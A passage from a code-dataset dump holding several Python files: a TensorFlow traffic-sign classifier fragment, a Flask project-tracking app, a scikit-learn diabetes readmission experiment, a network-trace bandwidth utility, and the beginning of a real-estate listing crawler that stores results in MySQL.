tf.image.rgb_to_grayscale(features_placeholder)\n\n# why int32? 
the labels are integer class ids, which tf.one_hot expects\nlogits_placeholder = tf.placeholder(tf.int32, (None), name='logits_placeholder')\none_hot = tf.one_hot(logits_placeholder, n_classes)\ndropout_prob = tf.placeholder(tf.float32)\n# logits = LeNet(features_placeholder)\nlogits = LeNet(features, dropout_prob=dropout_prob)\n\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot, 1))\naccuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nsaver = tf.train.Saver()\n\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=one_hot)\nloss_operation = tf.reduce_mean(cross_entropy)\noptimizer = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE)\ntraining_operation = optimizer.minimize(loss_operation)\n\n\ndef evaluate(X_data, y_data):\n    num_examples = len(X_data)\n    total_accuracy = 0\n    sess = tf.get_default_session()\n    for offset in range(0, num_examples, BATCH_SIZE):\n        batch_x, batch_y = X_data[offset:offset + BATCH_SIZE], y_data[offset:offset + BATCH_SIZE]\n        accuracy = sess.run(accuracy_operation,\n                            feed_dict={features_placeholder: batch_x, logits_placeholder: batch_y, dropout_prob: 1.0})\n        total_accuracy += (accuracy * len(batch_x))\n    return total_accuracy / num_examples\n\n\n# ## Train the Model\n\nwith tf.Session() as sess:\n    sess.run(tf.global_variables_initializer())\n    # num_examples = tra\n\n    print(\"Training...\")\n    print()\n    for i in range(EPOCHS):\n        # TODO Shuffle?\n        X_train, y_train = shuffle(train[\"features\"], train[\"labels\"])\n        for offset in range(0, n_train, BATCH_SIZE):\n            end = offset + BATCH_SIZE\n            batch_x, batch_y = X_train[offset:end], y_train[offset:end]\n            sess.run(training_operation,\n                     feed_dict={features_placeholder: batch_x, logits_placeholder: batch_y, dropout_prob: DROPOUT})\n\n        # TODO are the labels formatted correctly?\n        validation_accuracy = evaluate(valid[\"features\"], valid[\"labels\"])\n        print(\"EPOCH {} ...\".format(i + 1))\n        print(\"Validation Accuracy = {:.3f}\".format(validation_accuracy))\n        print()\n\n    saver.save(sess, './lenet')\n    print(\"Model saved\")\n\nwith tf.Session() as sess:\n    saver.restore(sess, tf.train.latest_checkpoint('.'))\n\n    test_accuracy = evaluate(test[\"features\"], test[\"labels\"])\n    print(\"Test Accuracy = {:.3f}\".format(test_accuracy))\n","sub_path":"Traffic_Sign_Classifier.py","file_name":"Traffic_Sign_Classifier.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"319298329","text":"import datetime\nimport sqlite3\n\nfrom flask import Flask, render_template, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\n\nimport module.func\n\n\n# sqlite3 database stuff\nSQLITE_DATABASE = 'temp_db.db'\nconn = sqlite3.connect(SQLITE_DATABASE)\nconn.close()\n\n# flask app\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///temp_db.db'\n\n#flask-sqlalchemy\ndb = SQLAlchemy(app)\n\n# models\n\n# TODO:\n## commit types\n## reference, comment, deliverable\n\n\nclass Client(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String)\n\n    projects = db.relationship('Project',\n                               backref=db.backref('Clients', lazy=True))\n\n    def __repr__(self):\n        return '<Client %r>' % self.id\n\n\nclass Project(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String)\n    expired = db.Column(db.Boolean, default=False)\n\n    client_id = db.Column(db.Integer, db.ForeignKey('client.id'),\n                          nullable=False)\n\n    commits = 
db.relationship('Commit',\n backref=db.backref('Project', lazy=True))\n\n\n def __repr__(self):\n return '<Project %r>' % self.id\n\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), nullable=False)\n picture = db.Column(db.String, default='default_user.jpg')\n\n commits = db.relationship('Commit',\n backref=db.backref('User', lazy=True))\n\n # lead:[PROJECT:ID]\n\n def __repr__(self):\n return '<User %r>' % self.id\n\n\nclass Commit(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n working_files = db.Column(db.String)\n deliverable = db.Column(db.String)\n subdate = db.Column(db.DateTime, default=datetime.datetime.utcnow)\n commit_type = db.Column(db.String)\n commit_round = db.Column(db.Integer, default=1)\n expired = db.Column(db.Boolean, default=False)\n note = db.Column(db.String)\n\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'),\n nullable=False)\n project_id = db.Column(db.Integer, db.ForeignKey('project.id'),\n nullable=False)\n\n def __repr__(self):\n return '<Commit %r>' % self.id\n\n\n# create tables\ndb.create_all()\n\n@app.route('/')\ndef index():\n # module.func.populate_db(db)\n data = {\n 'client': module.func.client_get(1),\n 'clients': module.func.client_all(),\n 'user': module.func.user_get(1),\n 'users': module.func.user_all(),\n 'project': module.func.project_get(1),\n 'projects': module.func.project_all(),\n 'commit': module.func.commit_get(1),\n 'commits': module.func.commit_all()\n }\n\n return render_template('index.html', data=data)\n\n\n@app.route('/client')\ndef clients():\n data = module.func.client_all()\n\n return render_template('clients.html', data=data)\n\n\n@app.route('/project')\ndef projects():\n data = module.func.project_all()\n\n return render_template('projects.html', data=data)\n\n\n@app.route('/user')\ndef users():\n data = module.func.user_all()\n\n return render_template('users.html', data=data)\n\n\n@app.route('/commit')\ndef commits():\n data = module.func.commit_all()\n\n return render_template('commits.html', data=data)\n\n\n@app.route('/client/<int:id>')\ndef client(id):\n data = module.func.client_get(id)\n\n # relational data\n # projects\n projects = []\n for project in data[0]['projects']:\n raw_project = Project.query.filter_by(id=project.id).first()\n projects.append(module.func.scheme_project(raw_project))\n\n data[0]['projects'] = projects\n\n\n return render_template('client.html', data=data)\n\n\n@app.route('/project/<int:id>')\ndef project(id):\n # get base project data\n data = module.func.project_get(id)\n\n # append relational\n # commits\n commits = []\n user_ids = []\n users = []\n for commit in data[0]['commits']:\n raw_commit = Commit.query.filter_by(id=commit.id).first()\n commits.append(module.func.scheme_commit(raw_commit))\n\n data[0]['commits'] = commits\n\n # user (only works if commits have been processed)\n for user in data[0]['commits']:\n if user['user_id'] not in user_ids:\n user_ids.append(user['user_id'])\n \n raw_user = User.query.filter_by(id=user['user_id']).first()\n if raw_user != None:\n users.append(module.func.scheme_user(raw_user))\n\n data[0]['users'] = users\n\n # commit\n # add replace commit:user_id with scheme_user()\n for commit in data[0]['commits']:\n if commit['user_id'] in user_ids:\n for user in data[0]['users']:\n if user['id'] == commit['user_id']:\n commit['user_id'] = {'id': user['id'], 'name': user['name']}\n\n # client\n client = {}\n raw_client = Client.query.filter_by(id=data[0]['client_id']).first()\n if 
raw_client:\n data[0]['client_id'] = module.func.scheme_client(raw_client)\n\n\n return render_template('project.html', data=data)\n\n\n@app.route('/user/<int:id>')\ndef user(id):\n # user data\n data = module.func.user_get(id)\n\n # append relational\n # commits\n commits = []\n project_ids = []\n projects = []\n for commit in data[0]['commits']:\n raw_commit = Commit.query.filter_by(id=commit.id).first()\n commits.append(module.func.scheme_commit(raw_commit))\n\n data[0]['commits'] = commits\n\n # projects (only works if commits have been processed)\n for commit in data[0]['commits']:\n if commit['project_id'] not in project_ids:\n project_ids.append(commit['project_id'])\n raw_project = Project.query.filter_by(id=commit['project_id']).first()\n if raw_project != None:\n projects.append(module.func.scheme_project(raw_project))\n\n data[0]['projects'] = projects\n\n\n return render_template('user.html', data=data)\n\n\n@app.route('/commit/<int:id>')\ndef commit(id):\n data = module.func.commit_get(id)\n\n # append relational\n # user\n user = {}\n raw_user = User.query.filter_by(id=data[0]['user_id']).first()\n if raw_user:\n data[0]['user_id'] = module.func.scheme_user(raw_user)\n\n # project\n project = {}\n raw_project = Project.query.filter_by(id=data[0]['project_id']).first()\n if raw_project:\n data[0]['project_id'] = module.func.scheme_project(raw_project)\n\n\n return render_template('commit.html', data=data)\n\n\n\"\"\"\n@app.route('/_get_current_user')\ndef get_current_user():\n return jsonify(username=g.user.username,\n email=g.user.email,\n id=g.user.id)\n\"\"\"\n\nif __name__ == \"__main__\":\n # app = create_app(config.DATABASE_URI, debug=True)\n app.run(debug=True)","sub_path":"project_commit/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"58004090","text":"import os\nimport pandas as pd\nimport numpy as np\n\nimport scipy\nimport math\n\nimport sklearn\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV, StratifiedShuffleSplit, cross_val_score\nfrom sklearn.metrics import accuracy_score\n\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.base import TransformerMixin, BaseEstimator \n\nfrom sklearn.dummy import DummyClassifier\n\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.preprocessing import OrdinalEncoder, OneHotEncoder, StandardScaler\n\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nfrom sklearn.naive_bayes import GaussianNB\n\nfrom sklearn.ensemble import VotingClassifier, RandomForestClassifier\nfrom sklearn.svm import SVC\n\nfrom sklearn.ensemble import BaggingClassifier, AdaBoostClassifier, GradientBoostingClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n def fit(self, X, y=None):\n return self\n def transform(self, X):\n return X[self.attribute_names].values\n\nnp.random.seed(42)\n\ndiabetic = pd.read_csv('diabetes/diabetic_data_balanced.csv')\n\n# Anonymise\ndiabetic = diabetic.groupby('patient_nbr', group_keys=False) \\\n .apply(lambda df: df.sample(1))\n\n\n# Train test split\nX, y = diabetic.drop('readmitted', axis=1), diabetic['readmitted']\n\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.1, random_state=42)\nfor train_index, test_index in split.split(X, y):\n X_train, X_test = X.iloc[train_index], 
X.iloc[test_index]\n    y_train, y_test = y.iloc[train_index], y.iloc[test_index]\n    \n\n# PREPROCESSING PIPELINE\ndiabetic_num_to_cat_features = ['admission_type_id', 'discharge_disposition_id','admission_source_id']\n\ndiabetic_cat_to_num_features = ['max_glu_serum', 'A1Cresult']\n\ndiabetic_num_features = ['time_in_hospital', 'num_lab_procedures','num_procedures', 'num_medications', 'number_outpatient', 'number_emergency', 'number_inpatient', 'number_diagnoses']\n\n\n# SET diabetic_drugs TO EITHER THE FULL LIST OR THE EMPTY LIST\n# TO SWITCH BETWEEN THE FULL AND REDUCED FEATURE SETS\n\n# diabetic_drugs = ['medical_specialty', 'metformin', 'repaglinide', 'nateglinide','chlorpropamide', 'glimepiride', 'acetohexamide', 'glipizide', 'glyburide','tolbutamide', 'pioglitazone', 'rosiglitazone', 'acarbose', 'miglitol','troglitazone', 'tolazamide', 'examide', 'citoglipton', 'insulin', 'glyburide-metformin', 'glipizide-metformin', 'glimepiride-pioglitazone','metformin-rosiglitazone', 'metformin-pioglitazone']\n\ndiabetic_drugs = []\n\ndiabetic_cat_features = ['race', 'gender', 'change', 'diabetesMed']\ndiabetic_diag_features = ['diag_1', 'diag_2', 'diag_3']\n\nnum_pipeline = Pipeline([\n    ('selector', DataFrameSelector(diabetic_num_features)),\n    ('imputer', SimpleImputer(strategy=\"median\")),\n    ('std_scaler', StandardScaler()),\n])\n\nage_pipeline = Pipeline([\n    ('selector', DataFrameSelector(['age'])),\n    ('ordinal_encoder', OrdinalEncoder(categories=[['[0-10)', '[10-20)', '[20-30)', '[30-40)', '[40-50)', '[50-60)', '[60-70)', '[70-80)', '[80-90)', '[90-100)']])),\n    ('std_scaler', StandardScaler()),\n])\n\nclass DiagEncoder(TransformerMixin):\n    def __init__(self, *args, **kwargs):\n        self.encoder = OneHotEncoder(*args, **kwargs, categories='auto', sparse=False)\n    def fit(self, X, y=0):\n        X = [[self.get_type(icd_str) for icd_str in x] for x in X]\n        self.encoder.fit(X)\n        return self\n    def transform(self, X, y=0):\n        X = [[self.get_type(icd_str) for icd_str in x] for x in X]\n        return self.encoder.transform(X)\n    def get_type(self, icd_str):\n        if isinstance(icd_str, float) and math.isnan(icd_str):\n            return('missing')\n        elif icd_str.isnumeric():\n            icd = int(icd_str)\n        elif icd_str[:3].isnumeric():\n            icd = int(icd_str[:3])\n        else:\n            return 'other'\n\n        if (icd >= 390 and icd <= 459 or icd == 785):\n            return 'circulatory'\n        elif (icd >= 520 and icd <= 579 or icd == 787):\n            return 'digestive'\n        elif (icd >= 580 and icd <= 629 or icd == 788):\n            return 'genitourinary'\n        elif (icd == 250):\n            return 'diabetes'\n        elif (icd >= 800 and icd <= 999):\n            return 'injury'\n        elif (icd >= 710 and icd <= 739):\n            return 'musculoskeletal'\n        elif (icd >= 140 and icd <= 239):\n            return 'neoplasms'\n        elif (icd >= 460 and icd <= 519 or icd == 786):\n            return 'respiratory'\n        else:\n            return 'other'\n    \n\ndiag_pipeline = Pipeline([\n    ('selector', DataFrameSelector(diabetic_diag_features)),\n    ('diag_encoder', DiagEncoder()),\n])\n\ncat_pipeline = Pipeline([\n    ('selector', DataFrameSelector(diabetic_num_to_cat_features + diabetic_cat_features + diabetic_drugs + diabetic_cat_to_num_features)),\n    ('imputer', SimpleImputer(strategy='constant')),\n    ('encoder', OneHotEncoder(categories='auto', sparse=False))\n\n])\n\nfull_pipeline = FeatureUnion(transformer_list=[\n    (\"num_pipeline\", num_pipeline),\n    ('age_pipeline', age_pipeline),\n    ('diag_pipeline', diag_pipeline),\n    (\"cat_pipeline\", cat_pipeline),\n])\n\nX_train = full_pipeline.fit_transform(X_train)\n\n\n# MACHINE LEARNING ALGORITHMS\nprint(X_train.shape)\n\n\n# MULTI-CLASS CLASSIFIERS \n\nsgd = 
SGDClassifier(random_state=42)\ncv_sgd = cross_val_score(sgd, X_train, y_train, cv=5, scoring='accuracy')\n# print(cv_sgd, np.mean(cv_sgd))\nprint('cv_sgd', np.mean(cv_sgd))\n\nlog_reg = LogisticRegression(random_state=42, multi_class='ovr', solver='liblinear')\ncv_log_reg = cross_val_score(log_reg, X_train, y_train, cv=5, scoring='accuracy')\n# print(cv_log_reg, np.mean(cv_log_reg))\nprint('cv_log_reg', np.mean(cv_log_reg))\n\n\ngnb = GaussianNB()\ncv_gnb = cross_val_score(gnb, X_train, y_train, cv=5, scoring='accuracy')\n# print(cv_gnb, np.mean(cv_gnb))\nprint('cv_gnb', np.mean(cv_gnb))\n\nbaseline = DummyClassifier(random_state=42)\ncv_baseline = cross_val_score(baseline, X_train, y_train, cv=5, scoring='accuracy')\n# print(cv_baseline, np.mean(cv_baseline))\nprint(\"cv_baseline\", np.mean(cv_baseline))\n\n# KERNEL TRICK \n\nfrom sklearn.kernel_approximation import RBFSampler\nrbf_features = RBFSampler(gamma=1, n_components=100, random_state=42)\nX_train_features = rbf_features.fit_transform(X_train)\nprint(X_train_features.shape)\n\nsgd = SGDClassifier(random_state=42)\ncv_sgd = cross_val_score(sgd, X_train_features, y_train, cv=5, scoring='accuracy')\nprint('cv_sgd', np.mean(cv_sgd))\n\nlog_reg = LogisticRegression(random_state=42, multi_class='ovr', solver='liblinear')\ncv_log_reg = cross_val_score(log_reg, X_train_features, y_train, cv=5, scoring='accuracy')\nprint('cv_log_reg', np.mean(cv_log_reg))\n\ngnb = GaussianNB()\ncv_gnb = cross_val_score(gnb, X_train_features, y_train, cv=5, scoring='accuracy')\nprint('cv_gnb', np.mean(cv_gnb))\n\n\n# GRID SEARCH LOGISTIC REGRESSION\n# specify the range of hyperparameter values for the grid search to try out \n\nparam_grid = {'penalty': ['l1', 'l2'], 'C': [0.25, 0.5, 1.0]}\n\nlog_reg_gs = LogisticRegression(random_state=42, solver='liblinear', multi_class='ovr')\ngrid_search = GridSearchCV(log_reg_gs, param_grid, cv=5,\n                           scoring=\"accuracy\")\ngrid_search.fit(X_train, y_train)\n\nprint(grid_search.best_params_, grid_search.best_score_)\n\n\n# VOTING CLASSIFIER\n\nlog_clf = LogisticRegression(random_state=42, multi_class='ovr', solver='liblinear')\nrnd_clf = RandomForestClassifier(random_state=42, n_estimators=100)\nsvm_clf = SVC(random_state=42, gamma='scale')\n\nvoting_clf = VotingClassifier(\n    estimators=[('lr', log_clf), ('rf', rnd_clf), ('svc', svm_clf)],\n    voting='hard')\n\ncv_voting = cross_val_score(voting_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_voting', np.mean(cv_voting))\n\n\n# BAGGING AND PASTING ENSEMBLES\n\n# Random Forest Classifier \n# (BaggingClassifier with DecisionTreeClassifier as base)\n\nrnd_clf = RandomForestClassifier(n_estimators=500, max_leaf_nodes=16, \n                                 n_jobs=-1, random_state=42, oob_score=True)\nrnd_clf.fit(X_train, y_train)\ncv_rnd_clf = cross_val_score(rnd_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_rnd_clf', np.mean(cv_rnd_clf), '(oob score {})'.format(rnd_clf.oob_score_))\n\n\nrnd_clf_pasting = RandomForestClassifier(n_estimators=500, max_leaf_nodes=16, \n                                         n_jobs=-1, random_state=42, bootstrap=False)\nrnd_clf_pasting.fit(X_train, y_train)\ncv_rnd_clf_pasting = cross_val_score(rnd_clf_pasting, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_rnd_clf_pasting', np.mean(cv_rnd_clf_pasting))\n\n\n# ADABOOST CLASSIFIER\n\nada_clf = AdaBoostClassifier(\n    DecisionTreeClassifier(max_depth=1), n_estimators=200,\n    algorithm=\"SAMME.R\", learning_rate=0.5, random_state=42)\ncv_ada_clf = cross_val_score(ada_clf, X_train, y_train, cv=5, 
scoring=\"accuracy\")\nprint('cv_ada_clf', np.mean(cv_ada_clf))\n\n# GRADIENT BOOSTING\n\ngb_clf = GradientBoostingClassifier(max_depth=10, n_estimators=100, learning_rate=0.1, random_state=42)\ncv_gb_clf = cross_val_score(gb_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_gb_clf', np.mean(cv_gb_clf))\n\n\n# GRADIENT BOOSTING WITH EARLY STOPPING\n\n# early stopping\ngbes_clf = GradientBoostingClassifier(max_depth=10, validation_fraction=0.1, n_iter_no_change=10, tol=0.01, n_estimators=100, learning_rate=0.1, random_state=42)\ncv_gbes_clf = cross_val_score(gbes_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_gbes_clf', np.mean(cv_gbes_clf))\n\n# AUTOML PIPELINE FOR HYPERPARAMETER TUNING\n\ntpot_best_clf = GradientBoostingClassifier(learning_rate=0.01, max_depth=10, max_features=0.2, min_samples_leaf=1, min_samples_split=14, n_estimators=100, subsample=0.9000000000000001, random_state=42)\n\ncv_tpot_best_clf = cross_val_score(tpot_best_clf, X_train, y_train, cv=5, scoring=\"accuracy\")\nprint('cv_tpot_best_clf', np.mean(cv_tpot_best_clf))\n\n\n\n","sub_path":"final_assignment_a/training/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":9954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"596892034","text":"import os\nimport numpy as np\nimport math\nimport pywt\n\n\nclass Utils:\n\n @staticmethod\n def diff(lst):\n diff_array = [lst[i] - lst[max(i - 1, 0)] for i in range(0, len(lst))]\n return diff_array\n\n @staticmethod\n def calc_interarrival_times(lst):\n return np.array(Utils.diff(lst))\n\n @staticmethod\n def calc_arrival_times(interarrival_times):\n arrival_times = np.cumsum(interarrival_times)\n return arrival_times.tolist()\n\n @staticmethod\n def mkdir(dir_name):\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n @staticmethod\n def calc_bandwidth(interarrival_times, packet_sizes, time_resolution=1.0, verbose=False):\n total_time = np.sum(interarrival_times)\n num_slices = math.ceil(total_time / time_resolution)\n time_slices = np.arange(time_resolution, total_time + time_resolution, time_resolution)\n pkt_size_acc = np.zeros(num_slices)\n curr_slice = 0\n curr_time = 0\n for i in range(len(interarrival_times)):\n curr_time += interarrival_times[i]\n if curr_time > time_slices[curr_slice]:\n # if the current time does not belong to the current time slice\n # search for the next time slice with packets available\n while curr_time > time_slices[curr_slice]:\n curr_slice += 1\n if curr_slice >= num_slices:\n break\n # accumulate the packet size in the current time slice array\n pkt_size_acc[curr_slice] += packet_sizes[i]\n # calc the bandwidth\n bandwidth = pkt_size_acc / time_resolution\n if verbose:\n print(\"Time Slices:\", time_slices)\n print(\"Bandwidth:\", bandwidth)\n return time_slices, bandwidth\n\n @staticmethod\n def calc_pps(interarrival_times, time_resolution=1.0, verbose=False):\n total_time = np.sum(interarrival_times)\n num_slices = math.ceil(total_time / time_resolution)\n time_slices = np.arange(time_resolution, total_time + time_resolution, time_resolution)\n pkt_size_acc = np.zeros(num_slices)\n curr_slice = 0\n curr_time = 0\n for i in range(len(interarrival_times)):\n curr_time += interarrival_times[i]\n if curr_time > time_slices[curr_slice]:\n # if the current time does not belong to the current time slice\n # search for the next time slice with packets available\n while curr_time > time_slices[curr_slice]:\n curr_slice += 1\n if curr_slice 
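The per-packet accumulation loop in calc_bandwidth above can be cross-checked with a vectorized sketch (not part of Utils.py; bin-edge conventions at slice boundaries may differ slightly from the loop):

import numpy as np

def calc_bandwidth_vectorized(interarrival_times, packet_sizes, time_resolution=1.0):
    # cumulative arrival time of each packet
    arrival_times = np.cumsum(interarrival_times)
    # one bin edge per time slice, covering the whole trace
    edges = np.arange(0.0, arrival_times[-1] + time_resolution, time_resolution)
    # sum packet sizes falling into each slice, then divide by the slice width
    bytes_per_slice, _ = np.histogram(arrival_times, bins=edges, weights=packet_sizes)
    return edges[1:], bytes_per_slice / time_resolution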
>= num_slices:\n break\n # accumulate the packet size in the current time slice array\n pkt_size_acc[curr_slice] += 1\n # calc the packets per second\n pps = pkt_size_acc / time_resolution\n if verbose:\n print(\"Time Slices:\", time_slices)\n print(\"Packets per Second:\", pps)\n return time_slices, pps\n\n @staticmethod\n def wavelet_multiresolution_energy_analysis_xy_from_bw(bandwidth_data):\n num_scales = len(bandwidth_data)\n\n energy_values = []\n for j in range(1, num_scales + 1):\n # Perform wavelet transform\n coeffs = pywt.wavedec(bandwidth_data[j - 1], 'db4', level=num_scales)\n cA = coeffs[0]\n # Calculate energy\n energy = np.sum(np.square(cA))\n energy_values.append(np.log2(energy))\n\n scales = np.arange(1, num_scales + 1)\n\n return scales, energy_values\n\n @staticmethod\n def wavelet_multiresolution_energy_analysis_xy(arrival_times, packet_sizes, number_of_scales):\n inter_arrival_times = Utils.calc_interarrival_times(arrival_times)\n\n # calc bandwidth at many time resolutions\n bandwidth_data = []\n for j in range(1, number_of_scales):\n time_resolution = pow(2, j - 1)\n print(f\"Calc bandwidth for time resolution of {time_resolution}ms\")\n _, bandwidth = Utils.calc_bandwidth(inter_arrival_times, packet_sizes, time_resolution=time_resolution)\n bandwidth_data.append(bandwidth)\n\n # perform wavelet multiresolution energy analysis\n scales, energy_values = Utils.wavelet_multiresolution_energy_analysis_xy_from_bw(bandwidth_data)\n\n return scales, energy_values","sub_path":"Sources/trace-plot/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"202444004","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\nimport requests\nimport re\nimport pymysql\nimport time\nimport os\n\n# Data cleaning helpers\nclass Tool:\n #remove double quotes\n removeQuo=re.compile('\"')\n #remove </b> and <b> tags\n removeB1=re.compile('</b>|<b>')\n #remove <span...> tags\n removeSp=re.compile('<span.*?>|</span>')\n #remove colons\n removeH=re.compile(':')\n #remove <br/> tags\n removeBr=re.compile('<br/>')\n\n def replace(self,x):\n x=re.sub(self.removeQuo,\"\",x)\n x=re.sub(self.removeB1,\"\",x)\n x=re.sub(self.removeSp,\"\",x)\n x=re.sub(self.removeH,\"\",x)\n x=re.sub(self.removeBr,\"\",x)\n #strip removes leading/trailing whitespace\n return x.strip()\n\n# Write to the MySQL database\nclass Mysql:\n\n def __init__(self):\n self.fields=['urlsite','price', 'bedrm', 'hall', 'bathrm', 'unit_price', 'area', 'house_age', 'orient', 'floor', 'tol_floor', 'block_name', 'block_volume', 'eval_volume', 'see_volume','maint_name', 'maint_tel', 'wok_time','maint_store','self_see', 'house_id']\n\n def getCurrentTime(self):\n return time.strftime('[%Y-%m-%d %H:%M:%S]')\n\n def insert(self,table,dict):\n self.config = {\n 'host': 'localhost',\n 'port': 3306,\n 'user': 'root',\n 'password': '123456',\n 'charset': 'utf8'\n }\n try:\n key=','.join(list(dict.keys()))\n value='\"'+'\",\"'.join(list(dict.values()))+'\"'\n self.sql='INSERT INTO %s(%s) values(%s)'%(table,key,value)\n self.connection = pymysql.connect(**self.config)\n try:\n with self.connection.cursor() as cursor:\n cursor.execute('USE internet_worm')\n # print(self.getCurrentTime(),'Executing MySQL statement %s'%self.sql)\n cursor.execute(self.sql)\n self.connection.commit()\n return 0\n except pymysql.Error as e:\n self.connection.rollback()\n # print(e.args)\n if \"key 'PRIMARY'\" in e.args[1]:\n print(self.getCurrentTime(),'Record already exists')\n else:\n print(self.getCurrentTime(),'Insert failed, reason %d: %s'%(e.args[0],e.args[1]))\n except pymysql.Error as e:\n 
print(self.getCurrentTime(),'Database error, reason %d: %s'%(e.args[0],e.args[1]))\n finally:\n self.connection.close()\n\n# Crawler\nclass Spider:\n\n def __init__(self):\n self.urlsite='http://tj.5i5j.com/exchange/n'\n #instantiate the Tool & Mysql helpers\n self.Tool=Tool()\n self.mysql=Mysql()\n\n def getCurrentTime(self):\n return time.strftime('[%Y-%m-%d %H:%M:%S]')\n\n # get the total page count\n # def getTotalPageNum(self):\n # return 300\n\n #crawl the listing page pageIndex\n def getpage(self,pageIndex):\n url=self.urlsite+str(pageIndex)\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',}\n print(self.getCurrentTime(),'Start crawling 5i5j second-hand listings, page %s'%pageIndex)\n try:\n res=requests.get(url,headers=headers)\n res.encoding = 'utf-8'\n with open('d:\\\\data\\\\page.txt', 'r+', encoding='utf-8') as q:\n q.write(str(pageIndex+1))\n return res.text\n except requests.RequestException as e:\n print(self.getCurrentTime(),'First-level link request error, reason: %r'%e)\n # with open('page-first.txt','r') as p1:\n # p1.write(pageIndex)\n\n #extract the second-level (detail) links from page pageIndex\n def getSecondlink(self,pageIndex):\n content=self.getpage(pageIndex)\n pattern_temp = re.compile('<ul class=\"list-body\">(.*)', re.S)\n items_temp = re.findall(pattern_temp, content)\n # print(items_temp)\n items_temp = items_temp[0]\n pattern = re.compile('<h2>.*?<a href=(.*?)target=\"_blank\">.*?</h2>',re.S)\n items1 = re.findall(pattern, items_temp)\n if not items1 : return None\n print(self.getCurrentTime(),\"Page %d contains %d listings\" % (pageIndex, len(items1)))\n secondurl=[]\n for item in items1:\n tempurl = 'http://tj.5i5j.com'+self.Tool.replace(item)\n secondurl.append(tempurl)\n return secondurl\n\n #fetch the detail pages behind the second-level links of page pageIndex\n def getSecondContent(self,pageIndex):\n secondurl=self.getSecondlink(pageIndex)\n if not secondurl: return None,None\n #for testing\n # secondurl=['http://bj.5i5j.com/exchange/139720448']\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'}\n resp=[]\n m=1\n for url in secondurl:\n time.sleep(1)\n # if m>2:break\n try:\n res = requests.get(url, headers=headers)\n res.encoding = 'utf-8'\n resp.append(res.text)\n print(self.getCurrentTime(),'Crawling page %d, link %d'%(pageIndex,m),'%d left'%(len(secondurl)-m))\n m+=1\n except requests.RequestException as e:\n print(self.getCurrentTime(),'Error crawling page %d link %d, reason: %r'%(pageIndex,m,e))\n return resp, secondurl\n\n #parse the fetched detail pages of page pageIndex\n def getSecondContentClear(self,pageIndex):\n (secondcontent,secondurl)=self.getSecondContent(pageIndex)\n if not secondurl:return None\n # print(secondcontent,secondurl)\n # Beijing 5i5j pattern\n # pattern = re.compile('<ul class=\"house-info\".*?售价(.*?)万元.*?<ul class=\"house-info-2\">.*?户型(.*?)室(\\d?)厅(\\d?)卫 .*?单价(.*?)元.*?<a href.*?面积(.*?)平米.*?</li>.*?年代(.*?)年.*?</li>.*?朝向(.*?)</li>.*?楼层.*?</b>(.*?)\\/(.*?)层/*?</li>.*?小区(.*?)<span>.*?小区成交记录(.*?)</a>.*?经纪人房评(.*?)</a>.*?客户看房数(.*?)</b>.*?<dl class=\"house-broker-info\">.*?<p class=\"mr-t\">(.*?)</p>.*?<p class=\"house-broker-tel\">(.*?)<a class=\"broker-wx-icon\".*?年限(.*?)年.*?所属门店.*?<a title=\"(.*?)\".*?本房源带看次数(.*?)次.*?<p class=\"house-code\">.*?<span>.*?房源编号(.*?)</span>',re.S)\n # Tianjin 5i5j pattern\n pattern = re.compile(\n '<ul class=\"house-info\">.*?售价(.*?)万元.*?<ul class=\"house-info-2\">.*?户型(.*?)室(\\d?)厅(\\d?)卫 .*?单价(.*?)元.*?<a 
